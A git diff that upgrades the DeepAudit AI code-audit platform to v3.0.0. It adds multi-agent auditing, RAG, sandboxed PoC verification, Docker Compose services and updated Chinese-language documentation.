diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml index 9834273..7f73157 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release.yml @@ -6,7 +6,7 @@ on: workflow_dispatch: inputs: version: - description: '版本号 (例如: v2.0.0)' + description: '版本号 (例如: v3.0.0)' required: true type: string prerelease: @@ -112,7 +112,7 @@ jobs: --exclude=backend/uploads \ backend/ - # 打包 Docker 配置文件 + # 打包 Docker 配置文件(包含 Agent 模式配置) tar -czf release/deepaudit-docker-${{ steps.version.outputs.VERSION }}.tar.gz \ docker-compose.yml \ backend/Dockerfile \ @@ -121,7 +121,8 @@ jobs: frontend/.dockerignore \ frontend/docker-entrypoint.sh \ backend/env.example \ - frontend/.env.example + frontend/.env.example \ + docker/sandbox/ # 打包完整源码(包括配置文件) tar -czf release/deepaudit-source-${{ steps.version.outputs.VERSION }}.tar.gz \ @@ -157,12 +158,19 @@ jobs: echo "" >> CHANGELOG.md echo "" >> CHANGELOG.md + echo "## 🚀 v3.0.0 新特性" >> CHANGELOG.md + echo "" >> CHANGELOG.md + echo "- 🤖 **Multi-Agent 架构**: Orchestrator/Analysis/Recon/Verification 多智能体协作" >> CHANGELOG.md + echo "- 🧠 **RAG 知识库增强**: 代码语义理解 + CWE/CVE 漏洞知识库" >> CHANGELOG.md + echo "- 🔒 **沙箱漏洞验证**: Docker 安全容器自动执行 PoC" >> CHANGELOG.md + echo "- 🛠️ **专业安全工具集成**: Semgrep, Bandit, Gitleaks, OSV-Scanner" >> CHANGELOG.md + echo "" >> CHANGELOG.md echo "## 📦 下载说明" >> CHANGELOG.md echo "" >> CHANGELOG.md echo "### 构建产物" >> CHANGELOG.md echo "- \`deepaudit-frontend-*.tar.gz\`: 前端构建产物(用于生产部署)" >> CHANGELOG.md echo "- \`deepaudit-backend-*.tar.gz\`: 后端源码包" >> CHANGELOG.md - echo "- \`deepaudit-docker-*.tar.gz\`: Docker 配置文件" >> CHANGELOG.md + echo "- \`deepaudit-docker-*.tar.gz\`: Docker 配置文件(包含沙箱配置)" >> CHANGELOG.md echo "- \`deepaudit-source-*.tar.gz\`: 完整源码包" >> CHANGELOG.md echo "- \`checksums.txt\`: 文件校验和" >> CHANGELOG.md echo "" >> CHANGELOG.md @@ -172,8 +180,11 @@ jobs: echo "" >> CHANGELOG.md echo "### 快速部署" >> CHANGELOG.md echo "\`\`\`bash" >> CHANGELOG.md - echo "# 使用 Docker Compose 部署" >> CHANGELOG.md - echo "docker-compose up -d" >> CHANGELOG.md + echo "# 基础部署" >> CHANGELOG.md + echo "docker compose up -d" >> CHANGELOG.md + echo "" >> CHANGELOG.md + echo "# Agent 模式部署(包含 Milvus 向量数据库)" >> CHANGELOG.md + echo "docker compose --profile agent up -d" >> CHANGELOG.md echo "\`\`\`" >> CHANGELOG.md # 12. 创建 GitHub Release @@ -235,7 +246,21 @@ jobs: cache-from: type=gha,scope=backend cache-to: type=gha,mode=max,scope=backend - # 18. 更新 README 中的版本号 + # 18. 构建并推送沙箱 Docker 镜像 + - name: 构建并推送沙箱 Docker 镜像 + uses: docker/build-push-action@v5 + with: + context: ./docker/sandbox + file: ./docker/sandbox/Dockerfile + push: true + platforms: linux/amd64,linux/arm64 + tags: | + ghcr.io/${{ github.repository_owner }}/deepaudit-sandbox:${{ steps.version.outputs.VERSION }} + ghcr.io/${{ github.repository_owner }}/deepaudit-sandbox:latest + cache-from: type=gha,scope=sandbox + cache-to: type=gha,mode=max,scope=sandbox + + # 19. 更新 README 中的版本号 - name: 更新 README 版本号 if: github.event_name == 'push' run: | diff --git a/.gitignore b/.gitignore index 2c86f48..3a78edf 100644 --- a/.gitignore +++ b/.gitignore @@ -168,3 +168,25 @@ Thumbs.db *.crt secrets/ .secrets/ + +# Agent checkpoints and data +agent_checkpoints/ +data/ +*.checkpoint + +# Scan result files (temporary) +bandit_results.json +semgrep_results.json +gitleaks_results.json +trufflehog_results.json + +# Test files +ttt/ +examples/ + +# Milvus data +milvus_data/ + +# ChromaDB data +chroma/ + diff --git a/README.md b/README.md index 7087d50..c6c6ad5 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,4 @@ -# DeepAudit - 您的智能代码审计专家 🦸‍♂️ - -> 多Agent、PR批量自动审计版本正在开发中,敬请期待...... +# DeepAudit - AI 驱动的智能代码安全审计平台 🛡️
DeepAudit Logo @@ -8,7 +6,7 @@
-[![Version](https://img.shields.io/badge/version-2.0.0--beta.7-blue.svg)](https://github.com/lintsinghua/DeepAudit/releases) +[![Version](https://img.shields.io/badge/version-3.0.0-blue.svg)](https://github.com/lintsinghua/DeepAudit/releases) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT) [![React](https://img.shields.io/badge/React-18-61dafb.svg)](https://reactjs.org/) [![TypeScript](https://img.shields.io/badge/TypeScript-5.7-3178c6.svg)](https://www.typescriptlang.org/) @@ -21,33 +19,44 @@
+## 🚀 v3.0.0 新特性 + +**DeepAudit v3.0.0** 带来了革命性的 **Multi-Agent 智能审计系统**: + +- 🤖 **Multi-Agent 架构** — Orchestrator 编排决策,Analysis/Recon/Verification 多智能体协作 +- 🧠 **RAG 知识库增强** — 代码语义理解 + CWE/CVE 漏洞知识库,精准识别安全风险 +- 🔒 **沙箱漏洞验证** — Docker 安全容器自动执行 PoC,验证漏洞真实有效性 +- 🛠️ **专业安全工具集成** — Semgrep、Bandit、Gitleaks、TruffleHog、OSV-Scanner + +--- + ## 💡 这是什么? **你是否也有这样的困扰?** - 😫 人工审计的无力:哪怕我不吃不睡,也追不上代码迭代的速度 - 🤯 传统工具的噪音:每天都在清理误报,感觉自己像个垃圾分类员 -- 😰 代码隐私的风险:想用 AI 却不敢“裸奔”,生怕源码泄露给云端 +- 😰 代码隐私的风险:想用 AI 却不敢"裸奔",生怕源码泄露给云端 - 🥺 外包项目的隐患:不知道里面藏了多少雷,却不得不签字验收 **DeepAudit 来拯救你!** 🦸‍♂️ -- 全自动智能审计:AI 不知疲倦地自动审计,让审计速度跑赢开发节奏 -- 上下文精准理解:告别死板的正则匹配,用大模型读懂代码业务逻辑,大大降低误报率 -- 支持本地私有部署:支持本地模型运行,代码数据可以不出内网,彻底根除“裸奔”焦虑 -- 深层隐患排查:一键扫描第三方外包项目、交付项目,快速揪出隐藏后门与逻辑炸弹,让签字验收有底气 +- 全自动智能审计:AI 驱动的 Multi-Agent 系统自主编排审计策略 +- 上下文精准理解:RAG 增强的代码语义理解,大大降低误报率 +- 沙箱验证漏洞:自动生成 PoC 并在隔离环境验证,确保漏洞真实有效 +- 支持本地私有部署:支持 Ollama 本地模型,代码数据可以不出内网 -## 🎬 眼见为实,但不仅如此: +## 🎬 眼见为实: | 智能仪表盘 | 即时分析 | |:---:|:---:| | ![仪表盘](frontend/public/images/example1.png) | ![即时分析](frontend/public/images/example2.png) | | *一眼掌握项目安全态势* | *粘贴代码/上传文件,秒出结果* | -| 项目管理 | 审计报告 | +| Agent 审计 | 审计报告 | |:---:|:---:| -| 项目管理 | 审计报告 | -| *GitHub/GitLab 无缝集成* | *专业报告,一键导出* | +| Agent审计 | 审计报告 | +| *Multi-Agent 深度安全分析* | *专业报告,一键导出* | | 审计规则管理 | 提示词模板管理 | |:---:|:---:| @@ -60,34 +69,47 @@ -### 🧠 真正理解你的代码 -不是简单的关键词匹配,而是深度理解代码逻辑和业务意图,像人类专家一样思考。 +### 🤖 Multi-Agent 智能协作 +- **Orchestrator Agent**: 统筹编排,自主决策审计策略 +- **Recon Agent**: 信息收集,识别技术栈和入口点 +- **Analysis Agent**: 深度分析,挖掘潜在安全漏洞 +- **Verification Agent**: 沙箱验证,确认漏洞真实有效 + +### 🧠 RAG 知识库增强 +- 代码语义理解,不只是关键词匹配 +- CWE/CVE 漏洞知识库集成 +- 精准漏洞识别,大幅降低误报 ### 🎯 What-Why-How 三步修复 - **What**: 精准定位问题所在 - **Why**: 解释为什么这是个问题 - **How**: 给出可直接使用的修复建议 -### 🔌 10+ LLM 平台任你选 -OpenAI、Claude、Gemini、通义千问、DeepSeek、智谱AI... 想用哪个用哪个,还支持 Ollama 本地部署! - -### ⚡ 5 分钟快速上手 -Docker 一键部署,浏览器配置 API Key,无需复杂环境搭建。 +### 🔒 沙箱安全验证 +- Docker 隔离容器执行 PoC +- 资源限制 + 网络隔离 + seccomp 策略 +- 自动验证漏洞可利用性 -### 🔒 代码隐私有保障 -支持 Ollama 本地模型,敏感代码不出内网,安全合规无忧。 +### 🛠️ 专业安全工具集成 +- **Semgrep**: 多语言静态分析 +- **Bandit**: Python 安全扫描 +- **Gitleaks/TruffleHog**: 密钥泄露检测 +- **OSV-Scanner**: 依赖漏洞扫描 -### 📊 专业报告一键导出 -JSON、PDF 格式随心选,审计报告直接交付,省去整理时间。 +### 🔌 10+ LLM 平台任你选 +OpenAI、Claude、Gemini、通义千问、DeepSeek、智谱AI... +还支持 Ollama 本地私有化部署! -## 🚀 3 步开始你的智能审计之旅 +## 🚀 快速开始 + +### Docker Compose 一键部署(推荐) ```bash # 1️⃣ 克隆项目 @@ -98,14 +120,26 @@ cp backend/env.example backend/.env # 编辑 backend/.env,填入你的 API Key # 3️⃣ 一键启动! -docker-compose up -d +docker compose up -d ``` 🎉 **搞定!** 打开 http://localhost:3000 开始体验吧! +### Agent 审计模式部署(可选) + +如需使用 Multi-Agent 深度审计功能: + +```bash +# 启动包含 Milvus 向量数据库的完整服务 +docker compose --profile agent up -d + +# 构建安全沙箱镜像(用于漏洞验证) +cd docker/sandbox && ./build.sh +``` + ### 演示账户 -系统内置演示账户,包含示例项目和审计数据,可直接体验完整功能: +系统内置演示账户,包含示例项目和审计数据: - 📧 邮箱:`demo@example.com` - 🔑 密码:`demo123` @@ -118,12 +152,15 @@ docker-compose up -d | 功能 | 说明 | |------|------| +| 🤖 **Agent 审计** | Multi-Agent 架构,Orchestrator 自主编排决策,深度漏洞挖掘 | +| 🧠 **RAG 增强** | 代码语义理解,CWE/CVE 知识库检索,精准漏洞识别 | +| 🔒 **沙箱验证** | Docker 安全容器执行 PoC,自动验证漏洞有效性 | | 🗂️ **项目管理** | GitHub/GitLab 一键导入,ZIP 上传,支持 10+ 编程语言 | | ⚡ **即时分析** | 代码片段秒级分析,粘贴即用,无需创建项目 | | 🔍 **智能审计** | Bug、安全、性能、风格、可维护性五维检测 | | 💡 **可解释分析** | What-Why-How 模式,精准定位 + 修复建议 | -| 📋 **审计规则** | 内置 OWASP Top 10、代码质量、性能优化规则集,支持自定义 | -| 📝 **提示词模板** | 可视化管理审计提示词,支持中英文双语,在线测试 | +| 📋 **审计规则** | 内置 OWASP Top 10、代码质量、性能优化规则集 | +| 📝 **提示词模板** | 可视化管理审计提示词,支持中英文双语 | | 📊 **可视化报告** | 质量仪表盘、趋势分析、PDF/JSON 一键导出 | | ⚙️ **灵活配置** | 浏览器运行时配置 LLM,无需重启服务 | @@ -141,15 +178,22 @@ docker-compose up -d ## 🎯 未来蓝图 -这个项目目前还比较初级,很多地方做得不够好,我们一直在努力改进!接下来才是我们真正想做的事情! +### ✅ 已完成 -- **接入 CI/CD** — 让它能跑在 GitHub/GitLab 流水线里,提 PR 的时候自动帮你批量审代码 -- **RAG 知识库** — 把 CWE/CVE 这些漏洞库喂给模型,让它真正懂安全,不再瞎报一通 -- **多 Agent 协作** — 多智能体架构,模拟真实的安全团队工作流程 -- **自动生成补丁** — 光说哪里有问题不够,还得能自动生成能用的修复代码 -- **混合分析** — AI 分析完再用传统 SAST 工具验证一遍,两边互相补充,减少误报漏报 -- **跨文件分析** — 做代码知识图谱,理解模块间的调用关系 -- **多仓库支持** — 除Github/GitLab以外,更新支持Gitea等更多平台以及自建仓库 +- ✅ **RAG 知识库** — 代码语义理解 + CWE/CVE 漏洞知识库集成 +- ✅ **多 Agent 协作** — Orchestrator/Analysis/Recon/Verification 多智能体架构 +- ✅ **沙箱验证** — Docker 安全容器自动执行 PoC 验证 + +### 🚧 开发中 + +- 🔄 **CI/CD 集成** — GitHub/GitLab 流水线自动审计,PR 批量扫描 +- 🔄 **自动生成补丁** — 基于漏洞分析自动生成修复代码 +- 🔄 **跨文件分析** — 代码知识图谱,理解模块间调用关系 + +### 📋 计划中 + +- 📋 **混合分析** — AI 分析 + 传统 SAST 工具验证,减少误报漏报 +- 📋 **多仓库支持** — Gitea、Bitbucket 等更多平台支持 💡 **您的 Star 和反馈是我们前进的最大动力!有任何想法欢迎提 Issue 一起讨论~** @@ -158,7 +202,8 @@ docker-compose up -d | 文档 | 说明 | |------|------| | [部署指南](docs/DEPLOYMENT.md) | Docker 部署 / 本地开发环境搭建 | -| [配置说明](docs/CONFIGURATION.md) | 后端配置、审计规则、提示词模板、API 中转站 | +| [Agent 审计](docs/AGENT_AUDIT.md) | Multi-Agent 审计模块详解 | +| [配置说明](docs/CONFIGURATION.md) | 后端配置、审计规则、提示词模板 | | [LLM 平台支持](docs/LLM_PROVIDERS.md) | 各家 LLM 的配置方法和 API Key 获取 | | [常见问题](docs/FAQ.md) | 遇到问题先看这里 | | [更新日志](CHANGELOG.md) | 版本更新记录 | diff --git a/backend/env.example b/backend/env.example index e798ed4..949f98c 100644 --- a/backend/env.example +++ b/backend/env.example @@ -1,5 +1,5 @@ # ============================================= -# DeepAudit Backend 配置文件 +# DeepAudit v3.0.0 Backend 配置文件 # ============================================= # 复制此文件为 .env 并填入实际配置 # 详细说明请参阅 docs/CONFIGURATION.md @@ -105,6 +105,70 @@ LLM_MAX_TOKENS=4096 # Ollama 本地模型 # OLLAMA_BASE_URL=http://localhost:11434/v1 +# ============================================= +# Agent 审计配置 (Multi-Agent v3.0.0 新增) +# ============================================= +# Agent 审计开关(开启后可使用 Multi-Agent 深度审计功能) +AGENT_ENABLED=true + +# Agent 最大迭代次数 +AGENT_MAX_ITERATIONS=5 + +# Agent 单次审计超时时间(秒) +AGENT_TIMEOUT=1800 + +# ============================================= +# 嵌入模型配置(RAG 功能,独立于主 LLM) +# ============================================= +# 嵌入模型 provider: openai, ollama, cohere, huggingface +EMBEDDING_PROVIDER=openai + +# 嵌入模型名称 +# OpenAI: text-embedding-3-small, text-embedding-3-large, text-embedding-ada-002 +# Ollama: nomic-embed-text, mxbai-embed-large +EMBEDDING_MODEL=text-embedding-3-small + +# 嵌入模型 API Key(留空则使用 LLM_API_KEY) +EMBEDDING_API_KEY= + +# 嵌入模型 Base URL(留空则使用默认值) +EMBEDDING_BASE_URL= + +# ============================================= +# 向量数据库配置(RAG 功能) +# ============================================= +# 向量数据库类型: milvus, chroma +VECTOR_DB_TYPE=chroma + +# ChromaDB 配置(本地模式) +CHROMA_PERSIST_DIRECTORY=./data/chroma + +# Milvus 配置(Agent 模式推荐) +# Docker Compose --profile agent 启动时使用 milvus 作为 host +MILVUS_HOST=localhost +MILVUS_PORT=19530 + +# ============================================= +# 沙箱配置(漏洞验证) +# ============================================= +# 沙箱功能开关 +SANDBOX_ENABLED=true + +# 沙箱 Docker 镜像(需要提前构建: cd docker/sandbox && ./build.sh) +SANDBOX_IMAGE=deepaudit-sandbox:latest + +# 沙箱内存限制 +SANDBOX_MEMORY_LIMIT=512m + +# 沙箱 CPU 限制(核心数) +SANDBOX_CPU_LIMIT=1.0 + +# 是否禁用沙箱网络(安全建议开启) +SANDBOX_NETWORK_DISABLED=true + +# 沙箱执行超时时间(秒) +SANDBOX_TIMEOUT=30 + # ============================================= # Git 仓库配置 # ============================================= diff --git a/bandit_results.json b/bandit_results.json deleted file mode 100644 index e69de29..0000000 diff --git a/check_imports.py b/check_imports.py deleted file mode 100644 index 6e3ff5c..0000000 --- a/check_imports.py +++ /dev/null @@ -1,16 +0,0 @@ - -try: - import docker - client = docker.from_env() - client.ping() - print("Docker is available and connected") -except Exception as e: - print(f"Docker connection failed: {e}") - -try: - from app.services.agent.tools.sandbox_tool import SandboxConfig, SandboxManager, SandboxTool # pyright: ignore[reportMissingImports] - print("Sandbox modules imported successfully") -except ImportError as e: - print(f"Sandbox import failed: {e}") -except Exception as e: - print(f"Sandbox import error: {e}") diff --git a/docker-compose.yml b/docker-compose.yml index 2eaf4f3..62e1b83 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -1,4 +1,14 @@ +# ============================================= +# DeepAudit v3.0.0 Docker Compose 配置 +# ============================================= +# 基础部署: docker compose up -d +# Agent 模式: docker compose --profile agent up -d + services: + # ============================================= + # 核心服务 + # ============================================= + db: image: postgres:15-alpine volumes: @@ -47,6 +57,90 @@ services: networks: - deepaudit-network + # ============================================= + # Agent 审计模式服务 (可选) + # 使用 --profile agent 启用 + # ============================================= + + # Milvus 向量数据库 (用于 RAG 功能) + milvus-etcd: + image: quay.io/coreos/etcd:v3.5.5 + profiles: ["agent"] + environment: + - ETCD_AUTO_COMPACTION_MODE=revision + - ETCD_AUTO_COMPACTION_RETENTION=1000 + - ETCD_QUOTA_BACKEND_BYTES=4294967296 + - ETCD_SNAPSHOT_COUNT=50000 + volumes: + - milvus_etcd:/etcd + command: etcd -advertise-client-urls=http://127.0.0.1:2379 -listen-client-urls http://0.0.0.0:2379 --data-dir /etcd + healthcheck: + test: ["CMD", "etcdctl", "endpoint", "health"] + interval: 30s + timeout: 20s + retries: 3 + networks: + - deepaudit-network + + milvus-minio: + image: minio/minio:RELEASE.2023-03-20T20-16-18Z + profiles: ["agent"] + environment: + MINIO_ACCESS_KEY: minioadmin + MINIO_SECRET_KEY: minioadmin + volumes: + - milvus_minio:/minio_data + command: minio server /minio_data --console-address ":9001" + healthcheck: + test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"] + interval: 30s + timeout: 20s + retries: 3 + networks: + - deepaudit-network + + milvus: + image: milvusdb/milvus:v2.4-latest + profiles: ["agent"] + command: ["milvus", "run", "standalone"] + security_opt: + - seccomp:unconfined + environment: + ETCD_ENDPOINTS: milvus-etcd:2379 + MINIO_ADDRESS: milvus-minio:9000 + volumes: + - milvus_data:/var/lib/milvus + ports: + - "19530:19530" + - "9091:9091" + depends_on: + - milvus-etcd + - milvus-minio + healthcheck: + test: ["CMD", "curl", "-f", "http://localhost:9091/healthz"] + interval: 30s + start_period: 90s + timeout: 20s + retries: 3 + networks: + - deepaudit-network + + # Redis (用于任务队列,可选) + redis: + image: redis:7-alpine + profiles: ["agent"] + ports: + - "6379:6379" + volumes: + - redis_data:/data + healthcheck: + test: ["CMD", "redis-cli", "ping"] + interval: 10s + timeout: 5s + retries: 5 + networks: + - deepaudit-network + networks: deepaudit-network: driver: bridge @@ -54,3 +148,7 @@ networks: volumes: postgres_data: backend_uploads: + milvus_etcd: + milvus_minio: + milvus_data: + redis_data: diff --git a/docs/AGENT_AUDIT.md b/docs/AGENT_AUDIT.md index 0a85432..e1a1a15 100644 --- a/docs/AGENT_AUDIT.md +++ b/docs/AGENT_AUDIT.md @@ -1,83 +1,109 @@ -# DeepAudit Agent 审计模块 +# DeepAudit Agent 审计模块 v3.0.0 ## 概述 -Agent 审计模块是 DeepAudit 的高级安全审计功能,基于 **LangGraph** 状态图构建的混合 AI Agent 架构,实现自主代码安全分析和漏洞验证。 +Agent 审计模块是 DeepAudit v3.0.0 的核心功能,基于 **Multi-Agent 架构** 实现自主代码安全分析和漏洞验证。 -## LangGraph 工作流架构 +### 核心特性 + +- 🤖 **Multi-Agent 协作**: Orchestrator 编排决策,多智能体协作审计 +- 🧠 **RAG 知识库增强**: 代码语义理解 + CWE/CVE 漏洞知识库 +- 🔒 **沙箱漏洞验证**: Docker 安全容器自动执行 PoC +- 🛠️ **专业工具集成**: Semgrep、Bandit、Gitleaks、OSV-Scanner 等 + +--- + +## 架构设计 + +### Multi-Agent 工作流 ``` ┌─────────────────────────────────────────────────────────────────────┐ -│ LangGraph 审计工作流 │ +│ DeepAudit Agent 审计工作流 │ ├─────────────────────────────────────────────────────────────────────┤ │ │ │ START │ │ │ │ │ ▼ │ -│ ┌────────────────────────────────────────────────────────────────┐│ -│ │ Recon Node (信息收集) ││ -│ │ • 项目结构分析 • 技术栈识别 ││ -│ │ • 入口点发现 • 依赖扫描 ││ -│ │ ││ -│ │ 使用工具: list_files, npm_audit, safety_scan, gitleaks_scan ││ -│ └────────────────────────────┬───────────────────────────────────┘│ -│ │ │ -│ ▼ │ -│ ┌────────────────────────────────────────────────────────────────┐│ -│ │ Analysis Node (漏洞分析) ││ -│ │ • Semgrep 静态分析 • RAG 语义搜索 ││ -│ │ • 模式匹配 • LLM 深度分析 ││ -│ │ • 数据流追踪 ││ -│ │ ◄─────┐ ││ -│ │ 使用工具: semgrep_scan, bandit_scan, rag_query, │ ││ -│ │ code_analysis, pattern_match │ ││ -│ └────────────────────────────┬──────────────────────────┘───────┘│ -│ │ │ │ -│ ▼ │ │ -│ ┌────────────────────────────────────────────────────────────────┐│ -│ │ Verification Node (漏洞验证) ││ -│ │ • LLM 漏洞验证 • 沙箱测试 ││ -│ │ • PoC 生成 • 误报过滤 ││ -│ │ ────────┘ ││ -│ │ 使用工具: vulnerability_validation, sandbox_exec, ││ -│ │ verify_vulnerability ││ -│ └────────────────────────────┬───────────────────────────────────┘│ -│ │ │ -│ ▼ │ -│ ┌────────────────────────────────────────────────────────────────┐│ -│ │ Report Node (报告生成) ││ -│ │ • 漏洞汇总 • 安全评分 ││ -│ │ • 修复建议 • 统计分析 ││ -│ └────────────────────────────┬───────────────────────────────────┘│ -│ │ │ -│ ▼ │ -│ END │ -│ │ -└────────────────────────────────────────────────────────────────────┘ - -状态流转: - • Recon → Analysis: 收集到入口点后进入分析 - • Analysis → Analysis: 发现较多问题时继续迭代 - • Analysis → Verification: 有发现时进入验证 - • Verification → Analysis: 误报率高时回溯分析 - • Verification → Report: 验证完成后生成报告 +│ ┌────────────────────────────────────────────────────────────────┐ │ +│ │ Orchestrator Agent (编排决策) │ │ +│ │ • 分析审计目标 • 制定审计策略 │ │ +│ │ • 分配子任务 • 汇总审计结果 │ │ +│ └────────────────────────────┬───────────────────────────────────┘ │ +│ │ │ +│ ┌────────────────┼────────────────┐ │ +│ ▼ ▼ ▼ │ +│ ┌──────────────────┐ ┌──────────────────┐ ┌──────────────────┐ │ +│ │ Recon Agent │ │ Analysis Agent │ │Verification Agent│ │ +│ │ (信息收集) │ │ (漏洞分析) │ │ (漏洞验证) │ │ +│ │ │ │ │ │ │ │ +│ │ • 项目结构分析 │ │ • Semgrep 扫描 │ │ • 沙箱测试 │ │ +│ │ • 技术栈识别 │ │ • RAG 语义搜索 │ │ • PoC 生成 │ │ +│ │ • 入口点发现 │ │ • LLM 深度分析 │ │ • 误报过滤 │ │ +│ │ • 依赖扫描 │ │ • 数据流追踪 │ │ • 置信度评估 │ │ +│ └────────┬─────────┘ └────────┬─────────┘ └────────┬─────────┘ │ +│ │ │ │ │ +│ └────────────────────┴────────────────────┘ │ +│ │ │ +│ ▼ │ +│ ┌────────────────────────────────────────────────────────────────┐ │ +│ │ Report Generation │ │ +│ │ • 漏洞汇总 • 安全评分 │ │ +│ │ • 修复建议 • 统计分析 │ │ +│ └────────────────────────────┬───────────────────────────────────┘ │ +│ │ │ +│ ▼ │ +│ END │ +│ │ +└─────────────────────────────────────────────────────────────────────┘ ``` -## 核心特性 +### Agent 职责 -### 1. LangGraph 状态图 +| Agent | 职责 | 使用工具 | +|-------|------|----------| +| **Orchestrator** | 统筹编排,自主决策审计策略 | 任务分配、结果汇总 | +| **Recon** | 信息收集,识别技术栈和入口点 | list_files, npm_audit, safety_scan, gitleaks | +| **Analysis** | 深度分析,挖掘潜在安全漏洞 | semgrep, bandit, rag_query, code_analysis | +| **Verification** | 沙箱验证,确认漏洞真实有效 | sandbox_exec, vulnerability_validation | -- **声明式工作流**: 使用图结构定义 Agent 协作流程 -- **状态自动合并**: `Annotated[List, operator.add]` 实现发现累加 -- **条件路由**: 基于状态动态决定下一步 -- **检查点恢复**: 支持任务中断后继续 +--- -### 2. Agent 工具集 +## 快速开始 -#### 内置工具 +### 1. 部署 Agent 模式 -| 工具 | 功能 | 节点 | -|------|------|------| +```bash +# 配置环境变量 +cp backend/env.example backend/.env +# 编辑 .env,设置 AGENT_ENABLED=true + +# 启动包含 Milvus 的完整服务 +docker compose --profile agent up -d +``` + +### 2. 构建沙箱镜像 + +```bash +cd docker/sandbox +./build.sh +``` + +### 3. 使用 Agent 审计 + +1. 在项目详情页点击 "Agent 审计" +2. 选择目标漏洞类型 +3. 可选:上传知识库文件增强检测 +4. 启动审计,实时查看 Agent 执行日志 + +--- + +## 工具集 + +### 内置工具 + +| 工具 | 功能 | Agent | +|------|------|-------| | `list_files` | 目录浏览 | Recon | | `read_file` | 文件读取 | All | | `search_code` | 代码搜索 | Analysis | @@ -91,7 +117,7 @@ Agent 审计模块是 DeepAudit 的高级安全审计功能,基于 **LangGraph | `sandbox_exec` | 沙箱执行 | Verification | | `verify_vulnerability` | 自动验证 | Verification | -#### 外部安全工具 +### 外部安全工具 | 工具 | 功能 | 适用场景 | |------|------|----------| @@ -103,93 +129,60 @@ Agent 审计模块是 DeepAudit 的高级安全审计功能,基于 **LangGraph | `safety_scan` | Safety Python 审计 | Python 依赖漏洞 | | `osv_scan` | OSV 漏洞扫描 | 多语言依赖漏洞 | -### 3. RAG 系统 +--- + +## RAG 系统 + +### 功能特点 - **代码分块**: 基于 Tree-sitter AST 的智能分块 -- **向量存储**: ChromaDB 持久化 +- **向量存储**: Milvus 或 ChromaDB 持久化 - **多语言支持**: Python, JavaScript, TypeScript, Java, Go, PHP, Rust 等 -- **嵌入模型**: 独立配置,支持 OpenAI、Ollama、Cohere、HuggingFace +- **知识库增强**: 支持上传自定义漏洞知识库 -### 4. 安全沙箱 +### 配置 -- **Docker 隔离**: 安全容器执行 +```env +# 嵌入模型配置 +EMBEDDING_PROVIDER=openai +EMBEDDING_MODEL=text-embedding-3-small + +# 向量数据库配置 +VECTOR_DB_TYPE=milvus +MILVUS_HOST=milvus +MILVUS_PORT=19530 +``` + +--- + +## 安全沙箱 + +### 功能特点 + +- **Docker 隔离**: 安全容器执行 PoC - **资源限制**: 内存、CPU 限制 - **网络隔离**: 可配置网络访问 - **seccomp 策略**: 系统调用白名单 -## 配置 +### 配置 -### 环境变量 - -```bash -# LLM 配置 -DEFAULT_LLM_MODEL=gpt-4-turbo-preview -LLM_API_KEY=your-api-key -LLM_BASE_URL=https://api.openai.com/v1 - -# 嵌入模型配置(独立于 LLM) -EMBEDDING_PROVIDER=openai -EMBEDDING_MODEL=text-embedding-3-small - -# 向量数据库 -VECTOR_DB_PATH=./data/vectordb - -# 沙箱配置 +```env +SANDBOX_ENABLED=true SANDBOX_IMAGE=deepaudit-sandbox:latest SANDBOX_MEMORY_LIMIT=512m SANDBOX_CPU_LIMIT=1.0 SANDBOX_NETWORK_DISABLED=true ``` -### Agent 任务配置 +### 沙箱镜像内置工具 -```json -{ - "target_vulnerabilities": [ - "sql_injection", - "xss", - "command_injection", - "path_traversal", - "ssrf" - ], - "verification_level": "sandbox", - "exclude_patterns": ["node_modules", "__pycache__", ".git"], - "max_iterations": 3, - "timeout_seconds": 1800 -} -``` +- Python 3.11 + Semgrep, Bandit, Safety +- Node.js 20 + npm audit +- Go 1.21 + OSV-Scanner +- Rust + cargo-audit +- Gitleaks, TruffleHog -## 部署 - -### 1. 安装依赖 - -```bash -cd backend -pip install -r requirements.txt - -# 可选:安装外部工具 -pip install semgrep bandit safety -brew install gitleaks trufflehog osv-scanner # macOS -``` - -### 2. 构建沙箱镜像 - -```bash -cd docker/sandbox -./build.sh -``` - -### 3. 数据库迁移 - -```bash -alembic upgrade head -``` - -### 4. 启动服务 - -```bash -uvicorn app.main:app --host 0.0.0.0 --port 8000 -``` +--- ## API 接口 @@ -227,6 +220,14 @@ GET /api/v1/agent-tasks/{task_id}/findings?verified_only=true GET /api/v1/agent-tasks/{task_id}/summary ``` +### 导出报告 + +```http +GET /api/v1/agent-tasks/{task_id}/report?format=markdown +``` + +--- + ## 支持的漏洞类型 | 类型 | 说明 | @@ -244,6 +245,8 @@ GET /api/v1/agent-tasks/{task_id}/summary | `authorization_bypass` | 授权绕过 | | `idor` | 不安全直接对象引用 | +--- + ## 目录结构 ``` @@ -257,11 +260,6 @@ backend/app/services/agent/ │ ├── analysis.py # 漏洞分析 Agent │ ├── verification.py # 漏洞验证 Agent │ └── orchestrator.py # 编排 Agent -├── graph/ # LangGraph 工作流 -│ ├── __init__.py -│ ├── audit_graph.py # 状态定义和图构建 -│ ├── nodes.py # 节点实现 -│ └── runner.py # 执行器 ├── tools/ # Agent 工具 │ ├── __init__.py │ ├── base.py # 工具基类 @@ -276,23 +274,65 @@ backend/app/services/agent/ └── system_prompts.py ``` +--- + ## 故障排除 -### 沙箱镜像检查 +### 常见问题 + +**Q: Agent 审计启动失败** ```bash +# 检查服务状态 +docker compose --profile agent ps + +# 查看后端日志 +docker compose logs backend | grep -i agent +``` + +**Q: RAG 初始化失败** + +```bash +# 检查 Milvus 连接 +curl http://localhost:9091/healthz + +# 检查嵌入模型配置 +# 确保 EMBEDDING_API_KEY 正确设置 +``` + +**Q: 沙箱执行失败** + +```bash +# 检查沙箱镜像 docker images | grep deepaudit-sandbox + +# 重新构建沙箱 +cd docker/sandbox && ./build.sh +``` + +**Q: 外部工具不可用** + +```bash +# 检查工具安装(本地开发时) +which semgrep bandit gitleaks + +# 或使用 Docker 沙箱执行 ``` ### 日志查看 ```bash +# 查看 Agent 日志 +docker compose logs -f backend | grep -E "(agent|Agent)" + +# 查看详细日志 tail -f logs/agent.log ``` -### 常见问题 +--- -1. **RAG 初始化失败**: 检查嵌入模型配置和 API Key -2. **沙箱启动失败**: 确保 Docker 正常运行 -3. **外部工具不可用**: 检查 semgrep/bandit 等是否已安装 +## 更多资源 +- 